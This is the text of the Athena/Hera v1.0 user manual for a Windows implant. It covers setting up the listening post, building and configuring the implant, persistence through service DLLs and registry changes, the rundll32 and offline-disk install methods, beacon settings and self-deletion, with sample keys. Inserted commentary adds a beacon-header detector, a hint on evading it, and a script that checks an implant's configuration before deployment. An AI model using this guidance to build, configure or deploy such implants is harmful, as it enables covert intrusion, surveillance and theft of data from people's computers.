Athena v1 - 0 UserGuide PDF
Athena / Hera
Version 1.0
User Manual
29 February 2016
SECRET//NOFORN
TABLE OF CONTENTS
1. (U) SCOPE
2. (U) SYSTEM OVERVIEW
3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)
  3.1 (U) SUMMARY OF CAPABILITIES
4. (S//NF) SYSTEM VERSIONS
  4.1 (S//NF) ATHENA
  4.2 (S//NF) HERA
  4.3 (S//NF) ATHENA/HERA VERSION COMPARISON
5. (U) LISTENING POST
  5.1 (U) INSTALLATION
  5.2 (U) CONFIGURATION
  5.3 (U) MANAGEMENT
6. (U) BUILDER
  6.1 (U) USAGE
  6.2 (U) COMMAND LINE OPTIONS
  6.3 (U) WIZARD
  6.4 (U) CONFIGURATION
  6.5 (U) OUTPUT
7. (U) IMPLANT INSTALLATION
  7.1 (U) OVERT INSTALLATION ON DISK MODE
  7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE
  7.3 (U) IMPLANT OFFLINE INSTALLATION
8. (U) TASKER
  8.1 (U) USAGE
  8.2 (U) COMMAND LINE OPTIONS
  8.3 (U) USER INTERFACE
  8.4 (U) USER INTERFACE EXAMPLE
  8.5 (U) OUTPUT
9. (U) PARSER
  9.1 (U) USAGE
  9.2 (U) COMMAND LINE OPTIONS
  9.3 (U) PROCESSING RESPONSES AND SAFETIES
  9.4 (U) OUTPUT
  9.5 (S//NF) ERROR CODES
10. (U) NOTES AND OBSERVATIONS
  10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES
  10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK
  10.3 (U) BUILDER DOES NOT PRODUCE A BIT COPY OF AN EXISTING CONFIGURED IMPLANT
  10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10 INSTALLATIONS
  10.5 (S//NF) TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES
11. (U) ACRONYMS / ABBREVIATIONS
LIST OF FIGURES
FIGURE 1 - (S//NF) ATHENA/HERA CONCEPT OF OPERATION
FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY
FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE
FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION
FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT
FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL
FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT
FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE
FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS
FIGURE 10 - (S//NF) SYSTEM BINARY PATH
FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW
FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML
FIGURE 13 - (S//NF) BUILDER OUTPUT FILES
FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER
FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION
FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS
FIGURE 17 - (S//NF) TASKER MAIN MENU
FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 1
FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 2
FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS
LIST OF TABLES
TABLE 1 - (U) APPLICABLE DOCUMENTS
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS
TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES
TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES
TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS
TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS
TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS
TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS
TABLE 9 - (U) COMMAND FILE ENCODING
TABLE 10 - (U) ERROR CODES
TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS
1. (U) Scope
(U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4
for a discussion of the specific characteristics of each system.
Table 1 - (U) Applicable Documents
Description                                           Date          Version
Athena v1.0 User Requirement Document (OPS0001051)    3-Feb-2016    REV G
Hera v1.0 User Requirement Document (OPS0001743)      15-Feb-2016   REV B
Athena v1.0 IV&V Report                               TBS           TBS
3. (S//NF) Athena/Hera Concept of Operation (CONOP)
(S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific
operational scenario. The operator then deploys the configured implant (Installer) on a target
computer.
(S//NF) Once activated, the Installer modifies the target registry and drops the host file
(IprCache.dll by default) and the data file (ras.cache by default) in their configured locations.
The installation tool then restarts the RemoteAccess service and launches the Athena Engine in the
netsvcs svchost.exe process. The installed tool beacons to the Listening Post (LP) to receive
tasking.
(S//NF) The system also allows the Operator to configure certain behaviors of the tool at runtime,
during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser (parser.py)
is used to decode the results retrieved from the Listening Post.
3.1 (U) Summary of Capabilities
(S//NF) The following is a summary of the system capabilities:
Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems.
Provides a beaconing capability that provides configuration and task handling
Provides memory loading/unloading of NOD Persistence Specification DLLs on the
target system
Provides delivery and retrieval of files to/from a specified directory on the target system
Allows the operator to configure settings during runtime (while the implant is on target)
4. (S//NF) System Versions
(S//NF) The system was designed to allow a base installation (Athena) and an extended
installation (Hera). Both versions contain the full command set defined in this document. This
section will describe the differences between the implementations and configurations.
File System Modification Location                                    Configuration Item   Description
SYSTEM\CurrentControlSet\services\RemoteAccess\RouterManagers\Ip     None                 Used by RemoteAccess Service
  (Windows 10 only)  GlobalInfo = <BINARY DATA>
SYSTEM\CurrentControlSet\services\RemoteAccess\RouterManagers\Ip     None                 Used by RemoteAccess Service
  (Windows 10 only)  ProtocolId = 0x00000021
4.3 (S//NF) Athena/Hera Version Comparison
Table 5 - (S//NF) Differences between Versions
Feature                        Athena                      Hera
Hash (function names)          Adler hash from zlib        Superfast hash
Mask (local encryption)        XTEA with key increment     AES with reduced key space
Packing Mask                   0x3B                        0x5C
String Mask                    0x5D8E1792                  0xAF27D2C9
Compilation                    MSVC 2013                   LLVM 3.7.0
Module Compilation             Installer.dll               Installer.bravo.dll
(actual modules using          Host.dll                    Host.bravo.dll
alternate compilation)         Ram_only.dll                Ram_only.bravo.dll
Persistence                    RemoteAccess                Dnscache
Compression                    ZLIB                        BZip2
ROOT folder
|---- server log files
|---- Parent ID folder (e.g., TEST)
|     |---- parent tasking files
|     |---- Child ID folder
|     |     |---- inbox folder (files received from the implant)
|     |     |     |---- responses and safety files
|     |     |---- outbox folder (files to be sent to the implant)
|     |           |---- tasking files
|     |---- Child ID folder
|
|---- Parent ID folder
Figure 2 - (S//NF) Listening Post Directory Hierarchy
(S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be
checked by viewing the /etc/apt/sources.list file.
> cat /etc/apt/sources.list
deb http://repo.devlan.net/ubuntu trusty main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-security main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-updates main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-backports main universe multiverse restricted
Figure 3 - (S//NF) Ubuntu Repository Listing Example
(S//NF) The SSL component of the install requires a valid SSL certificate. Answering N to the setup
prompt "Use pre-existing SSL certificate and key?" causes the setup script to generate a new
certificate for you. OpenSSL can also be used to generate a self-signed certificate, as in the
following example. Note that on Ubuntu 14.04 (OpenSSL 1.0.1) "genpkey -algorithm RSA" produces a
1024-bit key unless -pkeyopt rsa_keygen_bits:2048 is added, and "x509 -req" issues a certificate
valid for only 30 days unless -days is given.
> openssl genpkey -algorithm RSA -out a.key
> openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1
> openssl x509 -req -in a.req -signkey a.key -out a.cert
> sudo apt-get update
Figure 4 - (S//NF) Optional SSL Certificate Creation
(S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post
directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux
distribution already contains Python 3.4 pre-installed. Use the provided installation script to
complete the installation.
> sudo python3 setup.py -install
~/Desktop/listeningpost$ sudo python3 setup.py -install
Verifying packages are installed ...
Apache is not installed. Do you want to install? (Y/N) default: Y
Installing Apache...
Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y
Installing Mod-wsgi...
Python-pip is not installed. Do you want to install? (Y/N) default: Y
Installing pip3...
Python Bottle is not installed. Do you want to install? (Y/N) default: Y
Installing Bottle...
Failed installed. Try manual install.
One or more install packages did not exist or failed. Continue? (Y/N) default: N
y
Copying files to /var/www/html
Enter name of outbound folder: OUT
Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: /
Enter URL path of web resources (comma separated), i.e. /, /web: /html
Enabling mod-wsgi
Disabling default site.
Use pre-existing SSL certificate and key? (Y/N) default: N
5.2 (U) Configuration
(S//NF) The Listening Post instance is configured by a local JSON-encoded text file called
config.json. The setup script writes this file and copies the required Server python files to
/var/www/html. config.json holds the values gathered by the setup script and is read by the Server
python script on start-up. It can be edited manually to add, modify or delete entries; after any
edit, restart the Apache server to ensure the changes take effect. The config.json contains:
{
"DATA_URLS": ["/blog/comm", "/php/id", "/"],
"ROOT_DIR": "/srv/athena",
"WEB_URLS": ["/html", "/", "/web"],
"OUT_FOLDER": "OUT",
"IN_FOLDER": "IN",
"HOST" : "0.0.0.0",
"PORT" : "",
"LOG_SIZE" : "65536",
"HTTP_ERROR_CODE" : 200
}
Figure 8 - (S//NF) Listening Post Configuration File
Note
(U) URLs should start with a slash ("/") but should not have
an ending slash.
Host: (user-configured domain beacon names)
Connection: keep-alive (default)
Cache-Control: private, no-cache, no-store, max-age=0\r\n (default)
Cookie: session-id= (default parent ID and generated child ID masked with a generated key)
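The request-header fields listed above, together with the Builder wizard defaults for User Agent, Accept, Accept Language and Accept Encoding (items 12, 14, 15 and 16 of the configuration table), are exactly what the Builder section warns becomes a network signature when reused unmodified. The following is an added example, not part of this manual or the Athena/Hera tooling, of a check that scores raw HTTP request heads against those defaults; the three request heads are constructed, and the weights and threshold are this example's own choices:

```python
"""Flag HTTP requests that still carry the Builder's default beacon headers.

Added example; not from the Athena/Hera manual or its tooling. The header
values are the wizard defaults and the request-header sketch in the manual;
the request heads in SAMPLE_HEADS are constructed for illustration, and the
weights and threshold are this example's own choices.
"""
import re

DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)"
DEFAULT_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
DEFAULT_ACCEPT_LANG = "en-US,en;q=0.5"
DEFAULT_ACCEPT_ENC = "application/octet-stream"
DEFAULT_CACHE_CONTROL = "private, no-cache, no-store, max-age=0"
LONE_SESSION_COOKIE = re.compile(r"^session-id=[^;\s]+$")


def parse_head(raw):
    """Split a raw request head into (request_line, {lowercased name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def score(headers):
    """Return (score, reasons) for one request's headers.

    Accept-Encoding carries the most weight: browsers send content-codings
    (gzip, deflate) there, never a MIME type. The remaining values are
    ordinary IE11 headers that only matter in combination.
    """
    checks = [
        (headers.get("accept-encoding") == DEFAULT_ACCEPT_ENC, 3,
         "Accept-Encoding is a MIME type, not a content-coding"),
        (headers.get("cache-control") == DEFAULT_CACHE_CONTROL, 2,
         "Cache-Control carries 'private', a response-only directive, in a request"),
        (bool(LONE_SESSION_COOKIE.match(headers.get("cookie", ""))), 1,
         "Cookie is a lone session-id with no other cookies"),
        (headers.get("user-agent") == DEFAULT_UA, 1,
         "User-Agent equals the wizard default"),
        (headers.get("accept") == DEFAULT_ACCEPT
         and headers.get("accept-language") == DEFAULT_ACCEPT_LANG, 1,
         "Accept/Accept-Language equal the wizard defaults"),
    ]
    total, reasons = 0, []
    for hit, weight, why in checks:
        if hit:
            total += weight
            reasons.append(why)
    return total, reasons


def flag_beacons(raw_heads, threshold=4):
    """Return [(request_line, score, reasons)] for heads at or above threshold."""
    out = []
    for raw in raw_heads:
        request_line, headers = parse_head(raw)
        total, reasons = score(headers)
        if total >= threshold:
            out.append((request_line, total, reasons))
    return out


# Constructed request heads: an unmodified beacon, a genuine IE11 page load,
# and a command-line client.
SAMPLE_HEADS = [
    "GET / HTTP/1.1\r\nHost: abc.com\r\nConnection: keep-alive\r\n"
    "Cache-Control: private, no-cache, no-store, max-age=0\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: application/octet-stream\r\n"
    "Cookie: session-id=9f3a1c0e77b2d4a5\r\n",
    "GET /index.html HTTP/1.1\r\nHost: abc.com\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Accept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\nCookie: session-id=abc; theme=dark\r\n",
    "GET /api HTTP/1.1\r\nHost: abc.com\r\nUser-Agent: curl/7.35.0\r\nAccept: */*\r\n",
]

if __name__ == "__main__":
    for request_line, total, reasons in flag_beacons(SAMPLE_HEADS):
        print(request_line, total, "; ".join(reasons))
```

Only the first constructed head is flagged (score 8); the real IE11 request shares the platform string but sends a proper Accept-Encoding and several cookies, so it scores 0. An operator who changes items 12 through 16 from their defaults removes most of this score, which is the point the Builder section makes.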
6. (U) Builder
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion; reusing
defaults unmodified across multiple operations may present a signature that could identify the
presence of Athena in a network.
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
Warning
(S//NF) Implant configuration may be completed on the low-side; however, the operator should be
aware that cryptographic key data will be in the clear.
(S//NF) By default, the Builder will walk the operator through the process of configuring an
implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator
can also input all configuration values via command line arguments in order to build an implant
with a single command.
Builder
usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML]
[-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug]
Builder Configuration
optional arguments:
-h, --help show this help message and exit
-i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH
This argument provides the location of the raw binary
data files. (NOTE: .\bin is the default path).
-r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML
This argument defines an existing receipt filename to
be used for default values.
-o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH
This argument provides the output directory path to
store the target files (NOTE: .\builder_output is the
default path).
-w, --wizard This argument will request information from the user
via the wizard.
-b, --bravo This argument builds the Athena BRAVO implementation.
--debug This argument allows debugging information to be
included in the output directory.
BIN
  offline - linux offline files
    functions.sh
    linux.sh
    reged.static
    target_x64.ini
    target_x86.ini
  x64 - 64 bit implant components
    command.axe
    engine.axe
    host.dll
    install.dll
    offline.exe
    ram_only.dll
    uninstall.axe
  x86 - 32 bit implant components
    command.axe
    engine.axe
    host.dll
    install.dll
    offline.exe
    ram_only.dll
    uninstall.axe
Figure 10 - (S//NF) System Binary Path
Builder
Generating client RSA key pair
Generating server RSA key pair
Athena Wizard:
This wizard will guide you through the input options for the Athena tool.
Press enter to accept default value.
new value:
[WIZARD COMPLETE]
Figure 11 - (S//NF) Builder Wizard Review
Table 7 - (S//NF) Step-by-Step Implant Configuration Instructions

1  Target - Parent ID (4 chars)
   default:[RnzI]
   new value:
   Notes: The name used for this group of implants. Value: a name 4 characters in length.

2  Target - Child ID (number - dword)
   default:[]
   new value:
   Notes: The optional name of a specific implant, known as a child. This option allows the user to
   define a specific implant; otherwise the system will use the first 4 bytes of the MAC address
   or a random number.

5  Beacon - Jitter as a percentage of Interval 0..100 (number)
   default:[5]
   new value:
   Notes: The default jitter used to randomize the beacon time, as a percentage of the interval
   time. (NOTE: 0 disables jitter.) Value: percentage (0..100).

6  Beacon - Boot Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default boot delay for the implant: the amount of time to wait after a reboot.
   Value: time in seconds.

7  Beacon - Hibernation Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default hibernation delay for the implant: the amount of time to wait before the
   first beacon will be processed. Value: time in seconds.

8  Beacon - Tasking Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default tasking delay for all commands processed. Value: time in seconds.

9  Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma)
   default:[None]
   new value: abc.com
   Notes: The default domain name (hostname or IP address) of the Listening Post to be used for
   beaconing. Value: hostname(s) or IP address(es), comma separated.

10 Beacon - Port (number)
   default:[443]
   new value:
   Notes: The default port number used to beacon from the target. Value: port number (0..65535).

11 Beacon - Proxy Port NOTE: 0=disable (number)
   default:[0]
   new value:
   Notes: The default proxy port for processing beacons on the target. Value: port number
   (0..65535).

12 Beacon - User Agent String (string)
   default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)]
   new value:
   Notes: The default user agent string placed in the header when processing beacons on the
   target. Value: string.

13 Beacon - URL Path for LP (string)
   default:[/]
   new value:
   Notes: The default URL path on the server that is used for processing beacons on the target.
   WARNING: This value MUST be in the DATA_URLS field in the config.json file on the LP.
   Value: string.

14 Beacon - Accept Header (string)
   default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   new value:
   Notes: The default accept header in the packet when processing beacons on the target.
   Value: string.

15 Beacon - Accept Language Header (string)
   default:[en-US,en;q=0.5]
   new value:
   Notes: The default accept language header in the packet when processing beacons on the target.
   Value: string.

16 Beacon - Accept Encoding Header (string)
   default:[application/octet-stream]
   new value:
   Notes: The default accept encoding header in the packet when processing beacons on the target.
   WARNING: Changing this value may cause unexpected results when processing data on the target.
   Value: string.

17 Beacon - IE Proxy Address (string)
   default:[]
   new value:
   Notes: The default IE Proxy Address used to proxy beacon communication on the target.
   Value: string.

18 Beacon - WPAD Proxy Address (string)
   default:[]
   new value:
   Notes: The default WPAD Proxy Address used to proxy beacon communication on the target.
   Value: string.

19 Tasking - Overt State File Path (string)
   default:[]
   new value:
   Notes: The default overt state file path used to store state information during processing of
   commands. (NOTE: when empty, no state information is stored on target.) This directory will
   store state files (random file names) of current processing information. Value: string, full
   path.

20 Tasking - Batch Execution Timeout in seconds (number)
   default:[0]
   new value:
   Notes: The default batch execution timeout, used to cancel processing of long running batches.
   Value: time in seconds.

21 Tasking - Command Execution Timeout in seconds (number)
   default:[0]
   new value:
   Notes: The default command execution timeout, used to cancel processing of long running
   commands. Value: time in seconds.

22 Tasking - Chunk Size - maximum number of bytes in a single block (number)
   default:[0]
   new value:
   Notes: The default chunk size of a packet sent from the target to the Listening Post.
   Value: number in bytes.

23 Tasking - Max CPU Utilization 0..100 (number)
   default:[0]
   new value:
   Notes: The default maximum CPU utilization used by the system while processing commands.
   Value: percentage of system usage (0..100).

24 Tasking - Max Processing Data Size (number)
   default:[50331648]
   new value:
   Notes: The default maximum size of the data to process on target (the default is 48 MiB).
   Value: number in bytes.

25 Uninstall - Date (YYYY-MM-DDTHH:MM:SS) UTC
   default:[]
   new value:
   Notes: The default time and date of the automatic self-deletion of the target executable.
   Value: date (YYYY-MM-DDTHH:MM:SS).

26 Uninstall - Deadman Delay in seconds (number)
   default:[0]
   new value:
   Notes: The default delay after which the target will self-delete if it has not received a
   valid beacon. Value: time in seconds.

27 Uninstall - Beacon failure attempts (number)
   default:[0]
   new value:
   Notes: The default number of beacon failure attempts that force a self-delete of the target
   executable. Value: number.

28 Uninstall - Kill File Path - full file path on target (string)
   default:[]
   new value:
   Notes: The default kill file name that is used to force a self-delete when the file is present
   on the target system. Value: file name.

29 Install - Target File Name (string)
   default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll]
   new value:
   Notes: The default file path used for the host target file. Value: file name.

30 Install - Data File Name (string)
   default:[%SystemRoot%\System32\CodeIntegrity\ras.cache]
   new value:
   Notes: The default file path used for the data file on the target system. Value: file name.

31 Install - Restart service with Service Control Manager (SCM) (no,yes)
   default:[yes]
   new value:
   Notes: The option to restart the service after install. Otherwise, the tool will be installed
   but will not start until the next reboot or restart of the host service. Value: yes/no.
________________________________________________________________________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-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</CLIENT_KEY>
<TASKING>
<COMMAND_EXECUTE_TIMEOUT>10</COMMAND_EXECUTE_TIMEOUT>
<STATE_FILE_PATH>.\STATE_FILES</STATE_FILE_PATH>
<MAX_CPU_UTILIZATION>40</MAX_CPU_UTILIZATION>
<MAX_PROCESSING_DATA_SIZE>1000000</MAX_PROCESSING_DATA_SIZE>
<MAX_CHUNK_SIZE>0</MAX_CHUNK_SIZE>
<BATCH_EXECUTION_TIMEOUT>123</BATCH_EXECUTION_TIMEOUT>
</TASKING>
<INSTALL>
<RESTART_SERVICE>1</RESTART_SERVICE>
<TARGET_FILE_NAME>%SystemRoot
%\System32\Microsoft\Crypto\RAS\iprcache.dll</TARGET_FILE_NAME>
<ORIGINAL_FILE_NAME>%SystemRoot%\System32\iprtrmgr.dll</ORIGINAL_FILE_NAME>
<DATA_FILE_NAME>%SystemRoot%\System32\codeintegrity\ras.cache</DATA_FILE_NAME>
</INSTALL>
<UNINSTALL>
<KILL_FILE_PATH></KILL_FILE_PATH>
<DEAD_MAN_DELAY>0</DEAD_MAN_DELAY>
<BEACON_FAILURES>0</BEACON_FAILURES>
<DATE_AND_TIME></DATE_AND_TIME>
</UNINSTALL>
<BEACON>
<BOOT_DELAY>0</BOOT_DELAY>
<DOMAINS>10.3.2.56</DOMAINS>
<PORT>443</PORT>
<JITTER>0</JITTER>
<USER_AGENT_STRING>Mozilla/5.0 (Windows NT 6.3; Trident/7.0;
rv:11.0)</USER_AGENT_STRING>
<ACCEPT_STRING></ACCEPT_STRING>
<INTERVAL>5</INTERVAL>
<TASKING_DELAY>0</TASKING_DELAY>
<PROXY_PORT>0</PROXY_PORT>
<HIBERNATION_DELAY>0</HIBERNATION_DELAY>
<ACCEPT_LANG_STRING></ACCEPT_LANG_STRING>
<IE_PROXY_ADDRESS></IE_PROXY_ADDRESS>
<URL_PATH>/octopus/</URL_PATH>
<ACCEPT_ENCODING_STRING></ACCEPT_ENCODING_STRING>
<WPAD_PROXY_ADDRESS></WPAD_PROXY_ADDRESS>
</BEACON>
<SERVER_KEY>
<PUBLIC_KEY>-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----
</PUBLIC_KEY>
<PRIVATE_KEY>-----BEGIN RSA PRIVATE KEY-----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 21
9KQOrFATxmyIt0kXbWXQ1yNmRKnybXAWHleAzCj0qrKf7CtdRSPOB7WetwTH5ork
7FYwjPTWEr+hsDZmKXOuU3XvlCByNbKe7M2CilseCcqpzhmQDghH3lIAp+BTkwYL
zD5Z5IakrmXE+NmRafPUUZnEhmi1yNuinPeTlrULBbh3X6W9mvJQcOSFZ4HkaE5W
nFVG1GYYAISzBqgk4aALrupQGzshdQgvEcfOeEZuYUxRaqeQGvZS7z/cDQ/10Z7J
3NN4NMOj7VGMNj/tcW5ScEba5ZbZwnPZWiDChHTblOpkbnLKhb/o1898RFaEryg=
-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</SERVER_KEY>
<SOURCE>
<MASK>4D324A24C2EB88548A760390ED9DEAB6</MASK>
</SOURCE>
<TARGET>
<CHILD_ID>0xABCD0064</CHILD_ID>
<DYN_CONFIG_TYPE>0</DYN_CONFIG_TYPE>
<PARENT_ID>test</PARENT_ID>
</TARGET>
</ATHENA>
Figure 12 - (S//NF) Example Receipt File - XML
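Wizard item 13 warns that the implant's URL path must appear in the Listening Post's DATA_URLS, and the Section 5.2 note requires every URL entry to start with, and not end with, a slash; the receipt above carries URL_PATH as /octopus/, which would fail both checks against the config.json shown in Figure 8. The following added example (not one of the manual's scripts) reads a receipt in the Figure 12 layout together with a config.json in the Figure 8 layout and reports such inconsistencies before deployment. Both inputs are constructed samples with the key material omitted; the JITTER, PORT, PARENT_ID and CHILD_ID range checks follow wizard items 5, 10, 1 and 2:

```python
"""Consistency check between a Builder receipt and the LP config.json.

Added example; not part of the Athena/Hera tooling. It uses the receipt
element names from Figure 12 (ATHENA/BEACON/URL_PATH, DOMAINS, PORT,
JITTER, TARGET/PARENT_ID, CHILD_ID) and the config.json keys from Figure 8.
Rules applied are the ones the manual states: URL entries start with "/"
and have no trailing slash (Section 5.2 note); URL_PATH must be present in
DATA_URLS (wizard item 13); Parent ID is 4 characters (item 1); Child ID is
a dword (item 2); port is 0..65535 (item 10); jitter is 0..100 (item 5).
SAMPLE_RECEIPT and SAMPLE_CONFIG are constructed; key material is omitted.
"""
import json
import xml.etree.ElementTree as ET

SAMPLE_RECEIPT = """<ATHENA>
  <BEACON>
    <DOMAINS>10.3.2.56</DOMAINS>
    <PORT>443</PORT>
    <JITTER>0</JITTER>
    <URL_PATH>/octopus/</URL_PATH>
  </BEACON>
  <TARGET>
    <CHILD_ID>0xABCD0064</CHILD_ID>
    <PARENT_ID>test</PARENT_ID>
  </TARGET>
</ATHENA>"""

SAMPLE_CONFIG = """{
  "DATA_URLS": ["/blog/comm", "/php/id", "/"],
  "ROOT_DIR": "/srv/athena",
  "WEB_URLS": ["/html", "/", "/web"],
  "OUT_FOLDER": "OUT",
  "IN_FOLDER": "IN",
  "HOST": "0.0.0.0",
  "PORT": "",
  "LOG_SIZE": "65536",
  "HTTP_ERROR_CODE": 200
}"""


def url_findings(label, url):
    """Apply the Section 5.2 URL rule: leading slash, no trailing slash ("/" alone is fine)."""
    out = []
    if not url.startswith("/"):
        out.append(f"{label} {url!r} must start with '/'")
    if len(url) > 1 and url.endswith("/"):
        out.append(f"{label} {url!r} must not end with '/'")
    return out


def check(receipt_xml, config_json):
    """Return a list of findings; an empty list means the pair is consistent."""
    root = ET.fromstring(receipt_xml)
    cfg = json.loads(config_json)
    findings = []

    def text(path):
        node = root.find(path)
        return (node.text or "").strip() if node is not None else ""

    # Every URL list in config.json follows the same rule.
    for key in ("DATA_URLS", "WEB_URLS"):
        for url in cfg.get(key, []):
            findings += url_findings(f"config {key} entry", url)

    # The implant's path must be one the LP treats as a tasking resource.
    data_urls = cfg.get("DATA_URLS", [])
    url_path = text("BEACON/URL_PATH")
    findings += url_findings("receipt URL_PATH", url_path)
    if url_path not in data_urls:
        findings.append(f"receipt URL_PATH {url_path!r} is not in DATA_URLS {data_urls}")

    port = text("BEACON/PORT")
    if not (port.isdigit() and 0 <= int(port) <= 65535):
        findings.append(f"receipt PORT {port!r} is not in 0..65535")

    jitter = text("BEACON/JITTER")
    if not (jitter.isdigit() and 0 <= int(jitter) <= 100):
        findings.append(f"receipt JITTER {jitter!r} is not in 0..100")

    parent = text("TARGET/PARENT_ID")
    if len(parent) != 4:
        findings.append(f"receipt PARENT_ID {parent!r} is not 4 characters")

    child = text("TARGET/CHILD_ID")
    if child:
        try:
            is_dword = 0 <= int(child, 16) <= 0xFFFFFFFF
        except ValueError:
            is_dword = False
        if not is_dword:
            findings.append(f"receipt CHILD_ID {child!r} is not a dword")

    if not text("BEACON/DOMAINS"):
        findings.append("receipt DOMAINS is empty; the implant has no LP to beacon to")
    return findings


if __name__ == "__main__":
    for finding in check(SAMPLE_RECEIPT, SAMPLE_CONFIG):
        print("FINDING:", finding)
```

Against the constructed pair the check reports two findings, both about /octopus/: the trailing slash, and its absence from DATA_URLS. Adding "/octopus" to DATA_URLS and rebuilding the receipt with URL_PATH /octopus clears both.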
7. (U) Implant Installation
7.1 (U) Overt Installation on Disk Mode
(S//NF) Once the target is created with the Builder, the implant can be installed with the Installer
DLL. The DLL file name can be changed at deployment time.
Installer_x64.dll    64 bit installation DLL
Installer_x86.dll    32 bit installation DLL
(S//NF) A separate loader is required to load the Installer on the target system. For testing
purposes only, rundll32.exe (run with Administrator access) can be used as the loader. However,
running the Installer via rundll32.exe may be flagged by the PSP (see the discussion in Section
10.2).
Usage: rundll32 installer_x64.dll,#2
Note
(S//NF) The Shellterm entry point is at ordinal 1 and the
rundll32 entry point is at ordinal 2.
>offline_x64.exe
OFFLINE::Dec 21 2015
USAGE: offline <optional windows path>
Searching C:
Searching D:
Searching X:
Update options:
1) C:\Windows (x64)
2) D:\Window10 (x64)
Table 8 - (S//NF) Required Offline Installer Components
Component (utility)   Version
bash                  4.3.8 or greater
sed                   4.2.2
od                    8.2.1 or greater
reged.static          0.1 140201 (included in the Athena distribution)
fdisk                 2.20.1 or greater
mawk                  1.3.3 or greater
grep                  2.16-1 or greater
mount                 2.20.1-5 or greater
file                  1.5.14 or greater
(S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk
(e.g., Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera
media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file
(usually target.ini; the distribution ships target_x64.ini and target_x86.ini, see Figure 10).
Configuration parameters for the target are pulled from the INI file.
(S//NF) Run ./linux.sh <target.ini>. You will be prompted to select from the available target
Windows partitions; select the corresponding number as shown in Figure 15. Once you select the
